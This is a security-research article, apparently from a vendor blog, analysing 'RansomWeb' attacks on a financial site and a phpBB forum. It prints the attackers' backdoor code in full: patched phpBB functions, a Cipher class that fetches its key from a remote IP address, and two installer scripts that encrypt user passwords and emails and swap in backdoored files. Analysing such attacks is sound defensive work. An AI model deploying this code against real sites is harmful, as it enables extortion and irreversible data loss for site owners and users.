More and more people become victims of ransomware, a malware that encrypts your data and demands money to decrypt them. A new trend on the market shows that cybercriminals will now target your website as well to get a ransom payment from you.
In December 2014, our security experts discovered a very interesting case of a financial company website compromise: the website was out of service displaying a database error, while the website owner got an email asking for a ransom to “decrypt the database.” Web application in question was pretty simple and small, but very important for business of the company that could not afford to suspend it, neither to announce its compromise. Careful investigation that we performed revealed the following:
– The web application was compromised six months ago, several server scripts were modified to encrypt data before inserting it into the database, and to decrypt after getting data from the database. A sort of “on-fly” patching invisible to web application users.
– Only the most critical fields of the database tables were encrypted (probably not to impact web application performance a lot). All previously existing database records were encrypted accordingly.
– Encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by various traffic monitoring systems).
– During six months, hackers were silently waiting, while backups were being overwritten by the recent versions of the database.
– At the day X, hackers removed the key from the remote server. Database became unusable, website went out of service, and hackers demanded a ransom for the encryption key.
Free Cyber Security Training! Join the revolution today!
We were sure that it was an individual example of a sophisticated APT targeting concrete company, however last week we faced another similar case. One of our customers, an SMB, was blackmailed after his… phpBB forum went out of order. The forum was used as a main platform for customer support, and therefore was important for the customer.
It was the latest phpBB 3.1.2 released on the 25th of November 2014. No user could login (including forum moderators and admins). The forum was online, however all functions that require forum user to be authenticated didn’t work. Our thorough investigation revealed that forum engine was patched in such a way that users’ passwords and emails were encrypted “on-fly” between the web application and the database.
The following files were modified:
1. File “factory.php” has its “sql_fetchrow()” function modified in such a manner that the result of SQL query “$result = $this->get_driver()->sql_fetchrow($query_id);” in array “result” will have decrypted values of “user_password” and “user_email” table fields:
if(isset($result['user_password'])){
$result['user_password'] = $cipher->decrypt($result['user_password']);
}
if(isset($result['user_email'])){
$result['user_email'] = $cipher->decrypt($result['user_email']);
}
2. File “functions_user.php” has a modified version of “user_add” function to add encryption:
$sql_ary = array(
'username'=>$user_row['username'],
'username_clean' => $username_clean,
'user_password' => (isset($user_row['user_password']))?
$cipher->encrypt($user_row['user_password']):$cipher->encrypt(''),
'user_email'=> $cipher->encrypt(strtolower($user_row['user_email'])),
'user_email_hash'=> phpbb_email_hash($user_row['user_email']),
'group_id' => $user_row['group_id'],
'user_type' => $user_row['user_type'],
);
3. File “cp_activate.php” has a modified version of function “main()”:
$sql_ary = array(
'user_actkey' => '',
'user_password' => $cipher->encrypt($user_row['user_newpasswd']),
'user_newpasswd' => '',
'user_login_attempts' => 0,
);
4. File “ucp_profile.php” has a modified version of function “main()”:
if (sizeof($sql_ary))
{
$sql_ary['user_email'] = $cipher->encrypt($sql_ary['user_email']);
$sql_ary['user_password'] = $cipher->encrypt($sql_ary['user_password']);
$sql = 'UPDATE ' . USERS_TABLE . '
SET ' . $db->sql_build_array('UPDATE', $sql_ary) . '
WHERE user_id = ' . $user->data['user_id'];
$db->sql_query($sql);
5. File “config.php” had the following modification:
class Cipher {
private $securekey, $iv;
function __construct($textkey) {
$this->securekey = hash('sha256',$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents('https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt');
$cipher=new Cipher($key);
Moreover, we found two backdoor installation scripts left by hackers on the server that permit to backdoor any phpBB forum with just a couple of clicks. The first installer patches “config.php” file to add “Cipher” class that decrypts and encrypts the data with PHP “mcrypt_encrypt()” function storing the encryption key on a remote server:
<?php
$file = '../config.php';
$txt = "\n".'class Cipher {
private $securekey, $iv;
function __construct($textkey) {
$this->securekey = hash(\'sha256\',$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents(\'https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt\');
$cipher=new Cipher($key);'."\n";
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){
echo "DONE!";
};
And the second installer parses all existing phpBB users to encrypt their emails and passwords and replaces the above-mentioned phpBB files with backdoored copies:
<?php
define('IN_PHPBB', true);
$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : '../';
$phpEx = substr(strrchr(__FILE__, '.'), 1);
include($phpbb_root_path . 'common.' . $phpEx);
include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
$sql = 'SELECT user_id, user_password, user_email FROM ' . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
$sql2 = 'UPDATE ' . USERS_TABLE . '
SET
user_password = "'.$cipher->encrypt($row['user_password']).'",
user_email = "'.$cipher->encrypt($row['user_email']).'"
WHERE user_id = '.$row['user_id'];
$result2 = $db->sql_query($sql2);
}
echo "SQL UPDATED!<br>";
copy('factory.php', '../phpbb/db/driver/factory.php');
copy('functions_user.php', '../includes/functions_user.php');
copy('ucp_activate.php', '../includes/ucp/ucp_activate.php');
copy('ucp_profile.php', '../includes/ucp/ucp_profile.php');
echo "FILES UPDATED!";
Attackers waited for 2 months and then just removed the key from the remote server. Later we discovered that phpBB was compromised via stolen FTP password.
For the moment, no antivirus software detects even the installers as a known malware:
– “step1.php” file
– “step2.php” file
Following the wage of Ransomware attacks, we called this hacking technique RansomWeb. Let’s try to make a brief analysis of RansomWeb attacks: –
Potential Opportunities of RansomWeb:
– Different from DDoS attacks; they can have everlasting impact on web application availability.
– May be used not only for blackmailing but also for long-term website destruction.
– Backups cannot help a lot, as the database will be backuped in encrypted mode, while the encryption key is stored remotely and will not be backed up.
– Almost impossible to recover from the attack without paying the ransom, many victims won’t have a choice but to pay hackers.
– Hosting companies are not ready for this new challenge, and probably won’t be able to help their customers.
Potential Weaknesses of RansomWeb:
– Can be easily detected by a file integrity monitor (however, very few companies do file integrity monitoring for web applications that may change every day).
– Pretty difficult to encrypt entire database without damaging web application functionality and/or speed (nevertheless, even one DB field that is unrecoverable may ruin a web application).
– May be detected pretty quickly when used on regularly-updated web application.
Ilia Kolochenko, CEO of High-Tech Bridge says: “We are probably facing a new emerging threat for websites that may outshine defacements and DDoS attacks. RansomWeb attacks may cause unrepairable damage, they are very easy to cause and pretty difficult to prevent. Days when hackers were attacking websites for glory or fun are over, now financial profit drives them. The era of web blackmailing, racket and chantage is about to start.”
Marsel Nizamutdinov, Chief Research Officer, adds: “Cyber blackmailing and ransomware exists since a while already, however websites is a new vector of chantage. We have tens of millions of vulnerable web applications with critical data, and hackers will definitely not miss such a great opportunity to make money on negligent website administrators.”
Ilia Kolochenko continues: “The only way to prevent such attacks is to combine regular security monitoring with web application penetration testing.”
Will RansomWeb attacks outperform by efficiency and profitability DDoS, defacements, and data theft attacks against websites? Quite probably this question will be answered in 2015.
The original article can be found on the High-Tech Bridge blog here.
[su_box title=”About Ilia Kolochenko” style=”noise” box_color=”#336588″][short_info id=’60198′ desc=”true” all=”false”][/su_box]
The opinions expressed in this post belongs to the individual contributors and do not necessarily reflect the views of Information Security Buzz.